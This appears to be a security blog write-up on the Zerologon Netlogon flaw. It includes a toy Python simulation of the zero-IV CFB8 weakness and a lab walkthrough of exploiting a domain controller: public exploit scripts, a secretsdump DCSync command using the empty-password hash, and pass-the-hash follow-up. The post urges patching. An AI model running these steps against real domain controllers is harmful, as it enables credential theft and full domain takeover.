Zerologon, Patch or Die!

Nacho Brihuega, 14 October, 2020

Zerologon. If you are in the IT world and haven't heard this name yet, you should be worried. Keep reading.

Zerologon is possibly the vulnerability of this "special" year and certainly of the last few years. It is one of those vulnerabilities that leaves no one indifferent. First of all, is this vulnerability really that critical? Yes, yes and a thousand times yes. Personally, I would say that it is the most critical vulnerability I have seen since I entered the cybersecurity world.

Let's start from the beginning. Zerologon (CVE-2020-1472) was discovered by the company Secura and reported directly to Microsoft, which patched it in August 2020 and assigned it a CVSS score of 10.0 (out of 10, the highest possible criticality). Subsequently, on September 11, Secura published an advisory and a whitepaper on the vulnerability, together with a script (zerologon_tester.py) to detect vulnerable domain controllers. Since then, numerous PoCs and tools that exploit the vulnerability have been published.

Why is this vulnerability so critical? Because it allows anyone with network connectivity to a domain controller (no domain account is needed, not even a low-privileged one) to reset the password of the DC's own machine account to an empty string. With that account the attacker can dump every password hash in the domain, including the domain administrator's, and is effectively domain admin. I encourage you to read the article written by hackplayers on this subject (see References).

Zerologon Practical Analysis

Once we have seen the theory, let's get to practice. To test the vulnerability, a DC has been created in a virtual machine; in my case the victim machine has the IP 192.168.0.21.

First, once you have connectivity to the DC, you can use the Secura script to test whether the DC is vulnerable. The script takes the DC's NetBIOS hostname as a parameter in addition to its IP, so we need to obtain that name first. We can get it with nmap, or with an SMB enumeration using CrackMapExec, both of which report the NetBIOS name of the host. Passing that name together with the IP, the script tells us whether the DC is vulnerable to Zerologon.
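Secura's advisory attributes the bug to how Netlogon's ComputeNetlogonCredential encrypts the 8-byte client challenge: AES-128 in CFB8 mode with an IV fixed to sixteen zero bytes. The following Python is an added example, not code from the original article nor from Secura's or anyone else's tooling. It reproduces the mechanism with a generic CFB8 implementation over a hash-based stand-in block function (an assumption of the example: the all-zero behaviour depends only on the mode and the zero IV, not on which block cipher is used, so AES is not needed to show it). The session keys and labels it uses are constructed test data.

```python
"""Why Zerologon works: CFB8 with a fixed all-zero IV in Netlogon.

In CFB8 each output byte is  c[i] = p[i] XOR E(K, shift)[0]; the 16-byte
shift register starts as the IV and is then fed the previous ciphertext
byte.  With IV = 0 and plaintext = 0, if the first byte of E(K, 0^16) is
0x00 then c[0] = 0x00, the register stays all-zero and every later byte is
0x00 too.  That happens for about 1 in 256 session keys, so an attacker who
always sends ClientChallenge = 0 and ClientCredential = 0 succeeds after a
few hundred attempts, and computer accounts are not locked out for failures.
"""
import hashlib

BLOCK_SIZE = 16          # AES block size in bytes
CHALLENGE_SIZE = 8       # Netlogon client challenge / credential size
ZERO_IV = bytes(BLOCK_SIZE)


def toy_block_cipher(key: bytes, block: bytes) -> bytes:
    """Stand-in for AES-128 (assumption: any keyed 16-byte block function
    exhibits the same CFB8 property).  SHA-256(key || block) truncated to
    one block; it is NOT AES and must not be used for anything real."""
    return hashlib.sha256(key + block).digest()[:BLOCK_SIZE]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes, cipher=toy_block_cipher) -> bytes:
    """Generic CFB8 encryption over a 16-byte block function."""
    shift = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = p ^ cipher(key, bytes(shift))[0]
        out.append(c)
        shift = shift[1:] + bytes([c])   # feed the ciphertext byte into the register
    return bytes(out)


def cfb8_decrypt(key: bytes, iv: bytes, ciphertext: bytes, cipher=toy_block_cipher) -> bytes:
    """Generic CFB8 decryption; the register is fed ciphertext bytes as well."""
    shift = bytearray(iv)
    out = bytearray()
    for c in ciphertext:
        out.append(c ^ cipher(key, bytes(shift))[0])
        shift = shift[1:] + bytes([c])
    return bytes(out)


def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """Same structure as Netlogon's ComputeNetlogonCredential (CFB8, zero IV),
    with the toy cipher standing in for AES-128."""
    return cfb8_encrypt(session_key, ZERO_IV, challenge)


def is_zerologon_key(session_key: bytes) -> bool:
    """True when an all-zero challenge produces an all-zero credential, i.e. the
    attacker's fixed zero ClientCredential would be accepted under this key."""
    zero = bytes(CHALLENGE_SIZE)
    return compute_netlogon_credential(session_key, zero) == zero


def constructed_session_key(label: bytes, i: int) -> bytes:
    """Deterministic stand-in for the random session key the server derives on
    attempt i (constructed test data, not a real Netlogon key)."""
    return hashlib.sha256(label + i.to_bytes(4, "big")).digest()[:BLOCK_SIZE]


def simulate_attack(max_attempts: int = 5000, label: bytes = b"zerologon-demo"):
    """Attacker loop: each attempt sees a fresh session key the attacker does not
    know; the attacker always sends ClientChallenge = 0 and ClientCredential = 0.
    Returns the attempt on which the zero credential is accepted, or None."""
    zero = bytes(CHALLENGE_SIZE)
    for attempt in range(1, max_attempts + 1):
        expected = compute_netlogon_credential(constructed_session_key(label, attempt), zero)
        if expected == zero:             # roughly a 1/256 chance per attempt
            return attempt
    return None


def weak_key_fraction(samples: int = 8192, label: bytes = b"zerologon-stats") -> float:
    """Fraction of constructed session keys under which the zero credential is
    valid; expected to be close to 1/256 (about 0.0039)."""
    hits = sum(is_zerologon_key(constructed_session_key(label, i)) for i in range(samples))
    return hits / samples


if __name__ == "__main__":
    print(f"zero credential accepted on attempt {simulate_attack()}")
    print(f"weak-key fraction over 8192 keys: {weak_key_fraction():.4f} (expect about 0.0039)")
```

The point to take from it: the attacker never needs the session key. Retrying the same all-zero handshake until the server happens to pick a key whose first encrypted byte is zero is all it takes, which is exactly what the public exploit scripts loop on.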
Once we have checked that it is in fact vulnerable, we can exploit it with dirkjanm's CVE-2020-1472 repository, which contains two scripts:

cve-2020-1472-exploit.py: automates exploitation of the vulnerability, setting the DC's machine account password to an empty string.
restorepassword.py: restores the original machine account password.

However, if we run the exploit as it is, we may run into a problem with an outdated impacket installation. To solve this, we can choose either of the following options:

Remove impacket and install the latest version from source (see the reference below).
Use a virtualenv (the S4vitar article in the references shows how).

Running it again, it works.

Likewise, the author of Mimikatz has already updated the tool to take advantage of this vulnerability and has published a GIF with the PoC.

How can this be used? Once the DC's machine account password is empty, we can authenticate as the DC's computer account using the NT hash of the empty password (31d6cfe0d16ae931b73c59d7e0c089c0) and perform a DCSync with impacket's secretsdump.py:

secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'

In our case, this returns a list of all the hashes of the domain users.

You could then either crack the hashes or use the Pass the Hash technique to authenticate against the DC. To do this, you can use pth-winexe or evil-winrm with the administrator hash.

To restore the DC's original machine account password, you will need to use the "restorepassword" script, passing the original password (hex-encoded, as recovered from the DC's local secrets):

python restorepassword.py <DOMAIN>/<hostname>@<hostname> -target-ip IP -hexpass 54656d706f7………etc

or use the equivalent functionality from the other public repository:

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH

Remember to restore the password if you try this in an intrusion test: a DC left with an empty machine account password stops working correctly. And above all… Patch, patch, patch!
Recommendations

Identify vulnerable machines with the Secura check script and apply the patch: CVE-2020-1472 | Netlogon Elevation of Privilege Vulnerability (Microsoft) and CVE-2020-1472 Detail.

References

[Blog] Zerologon: instantly become domain admin by subverting Netlogon cryptography (CVE-2020-1472), Secura
CVE-2020-1472 | Netlogon Elevation of Privilege Vulnerability, Microsoft
Hacking Windows con Zerologon: Vulnerabilidad crítica que puede comprometer tu Domain Controller #Parchea (in Spanish: Hacking Windows with Zerologon: a critical vulnerability that can compromise your Domain Controller #Patch)
Zerologon desatado: la vulnerabilidad que permite comprometer cualquier controlador de dominio de Windows fácilmente (in Spanish: Zerologon unleashed: the vulnerability that makes it easy to compromise any Windows domain controller)
CCN-CERT AL 09/20 Vulnerabilidad crítica en Windows Server (in Spanish: Critical vulnerability in Windows Server)